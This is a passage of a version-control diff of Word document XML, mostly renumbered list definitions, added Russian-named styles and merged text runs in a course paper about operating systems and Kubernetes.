     <w:tmpl w:val="2236DD4C"/>
@@ -7825,7 +6861,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="31F364F3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="337C7BBC"/>
@@ -7938,7 +6974,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36103255"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0D20E014"/>
@@ -8051,7 +7087,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="37615467"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="433A8DE2"/>
@@ -8137,7 +7173,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3BF57415"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="41DE3C32"/>
@@ -8224,7 +7260,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3CBE06EA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EF94C328"/>
@@ -8337,7 +7373,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="432642D1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CF964D6A"/>
@@ -8449,10 +7485,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4B3C7C08"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="67BE3D84"/>
+    <w:tmpl w:val="33F806F6"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
@@ -8571,7 +7607,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4FC04CB4"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0CC648DC"/>
@@ -8657,7 +7693,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="540D3D75"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8D324CCE"/>
@@ -8743,7 +7779,156 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="55556929"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="133C48D4"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5724380D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="72C8C996"/>
@@ -8829,7 +8014,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5D067962"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8D324CCE"/>
@@ -8915,7 +8100,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5FDF2CBB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="411074C6"/>
@@ -9001,7 +8186,184 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="63C83F5B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="98CEC5C4"/>
+    <w:lvl w:ilvl="0" w:tplc="43E86638">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:pStyle w:val="-"/>
+      <w:lvlText w:val="Таблица %1 -"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="68916177"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="C9C8A6EA"/>
+    <w:lvl w:ilvl="0" w:tplc="F6441E36">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:pStyle w:val="-0"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1429" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2149" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2869" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3589" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4309" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="5029" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5749" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6469" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="7189" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="71B737AF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CB4243CE"/>
@@ -9087,7 +8449,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="75407427"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="76A61BE0"/>
@@ -9173,7 +8535,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76B83FF6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2414654C"/>
@@ -9259,7 +8621,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A903472"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="D676FBFC"/>
@@ -9348,7 +8710,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7B931382"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="90FC8998"/>
@@ -9465,82 +8827,82 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="249629675">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1178883772">
-    <w:abstractNumId w:val="14"/>
+    <w:abstractNumId w:val="15"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="120196947">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="2132549115">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="5" w16cid:durableId="2132549115">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
   <w:num w:numId="6" w16cid:durableId="1907565833">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1083450351">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1820072790">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="870457253">
+    <w:abstractNumId w:val="21"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="457139138">
+    <w:abstractNumId w:val="22"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="245848710">
     <w:abstractNumId w:val="19"/>
   </w:num>
-  <w:num w:numId="10" w16cid:durableId="457139138">
-    <w:abstractNumId w:val="20"/>
-  </w:num>
-  <w:num w:numId="11" w16cid:durableId="245848710">
+  <w:num w:numId="12" w16cid:durableId="2045128810">
     <w:abstractNumId w:val="18"/>
-  </w:num>
-  <w:num w:numId="12" w16cid:durableId="2045128810">
-    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="13" w16cid:durableId="1373268555">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="14" w16cid:durableId="1413770712">
+    <w:abstractNumId w:val="13"/>
+  </w:num>
+  <w:num w:numId="15" w16cid:durableId="932324599">
+    <w:abstractNumId w:val="23"/>
+  </w:num>
+  <w:num w:numId="16" w16cid:durableId="1760448808">
+    <w:abstractNumId w:val="26"/>
+  </w:num>
+  <w:num w:numId="17" w16cid:durableId="123934881">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1597443151">
     <w:abstractNumId w:val="12"/>
   </w:num>
-  <w:num w:numId="15" w16cid:durableId="932324599">
-    <w:abstractNumId w:val="21"/>
-  </w:num>
-  <w:num w:numId="16" w16cid:durableId="1760448808">
-    <w:abstractNumId w:val="22"/>
-  </w:num>
-  <w:num w:numId="17" w16cid:durableId="123934881">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="18" w16cid:durableId="1597443151">
-    <w:abstractNumId w:val="11"/>
-  </w:num>
   <w:num w:numId="19" w16cid:durableId="976646909">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="30"/>
   </w:num>
   <w:num w:numId="20" w16cid:durableId="1306201552">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="21" w16cid:durableId="1257058031">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="28"/>
   </w:num>
   <w:num w:numId="22" w16cid:durableId="372195541">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="23" w16cid:durableId="1748989788">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="24" w16cid:durableId="1780373040">
-    <w:abstractNumId w:val="25"/>
+    <w:abstractNumId w:val="29"/>
   </w:num>
   <w:num w:numId="25" w16cid:durableId="1449549874">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="26" w16cid:durableId="402526936">
     <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="27" w16cid:durableId="1441687026">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -9570,10 +8932,10 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="28" w16cid:durableId="1813787601">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
   </w:num>
   <w:num w:numId="29" w16cid:durableId="993676681">
-    <w:abstractNumId w:val="16"/>
+    <w:abstractNumId w:val="17"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -9609,7 +8971,7 @@
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="32" w16cid:durableId="598296271">
-    <w:abstractNumId w:val="13"/>
+    <w:abstractNumId w:val="14"/>
   </w:num>
   <w:num w:numId="33" w16cid:durableId="1896232310">
     <w:abstractNumId w:val="3"/>
@@ -9622,6 +8984,54 @@
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="35" w16cid:durableId="977105911">
+    <w:abstractNumId w:val="20"/>
+  </w:num>
+  <w:num w:numId="36" w16cid:durableId="1518228335">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="37" w16cid:durableId="993338923">
+    <w:abstractNumId w:val="25"/>
+  </w:num>
+  <w:num w:numId="38" w16cid:durableId="527840628">
+    <w:abstractNumId w:val="25"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="39" w16cid:durableId="279655649">
+    <w:abstractNumId w:val="17"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="2"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="1">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="2">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="3">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="4">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="5">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="6">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="7">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+    <w:lvlOverride w:ilvl="8">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="40" w16cid:durableId="1826163918">
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="18"/>
 </w:numbering>
@@ -10066,7 +9476,6 @@
         <w:ilvl w:val="1"/>
         <w:numId w:val="28"/>
       </w:numPr>
-      <w:ind w:left="0" w:firstLine="0"/>
       <w:outlineLvl w:val="1"/>
     </w:pPr>
     <w:rPr>
@@ -10238,7 +9647,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -10415,6 +9823,7 @@
   <w:style w:type="paragraph" w:styleId="NormalWeb">
     <w:name w:val="Normal (Web)"/>
     <w:basedOn w:val="Normal"/>
+    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:pPr>
       <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
@@ -10942,6 +10351,57 @@
       <w:color w:val="5B9BD5" w:themeColor="accent1"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="Strong">
+    <w:name w:val="Strong"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="22"/>
+    <w:qFormat/>
+    <w:rsid w:val="007D296C"/>
+    <w:rPr>
+      <w:b/>
+      <w:bCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Emphasis">
+    <w:name w:val="Emphasis"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="20"/>
+    <w:qFormat/>
+    <w:rsid w:val="007D296C"/>
+    <w:rPr>
+      <w:i/>
+      <w:iCs/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-0">
+    <w:name w:val="список - ЦИФРЫ"/>
+    <w:basedOn w:val="ListParagraph"/>
+    <w:qFormat/>
+    <w:rsid w:val="006E0717"/>
+    <w:pPr>
+      <w:numPr>
+        <w:numId w:val="37"/>
+      </w:numPr>
+      <w:ind w:left="709" w:firstLine="0"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="-">
+    <w:name w:val="Подпись - ТАБЛИЦА"/>
+    <w:next w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00FF2D6B"/>
+    <w:pPr>
+      <w:numPr>
+        <w:numId w:val="40"/>
+      </w:numPr>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="28"/>
+      <w:szCs w:val="48"/>
+      <w:lang w:val="en-US"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
+++ b/CW/OS/Курсовая_ОС_Kubernetes_Михайлич.docx
@@ -1941,14 +1941,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:noProof/>
           </w:rPr>
-          <w:t>П</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:noProof/>
-          </w:rPr>
-          <w:t xml:space="preserve">одготовка ос для исследования </w:t>
+          <w:t xml:space="preserve">Подготовка ос для исследования </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -2801,14 +2794,12 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ConfigMap</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -3037,19 +3028,11 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Kubelet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kubelet </w:t>
       </w:r>
       <w:r>
         <w:t>процесс</w:t>
@@ -3164,14 +3147,12 @@
       <w:r>
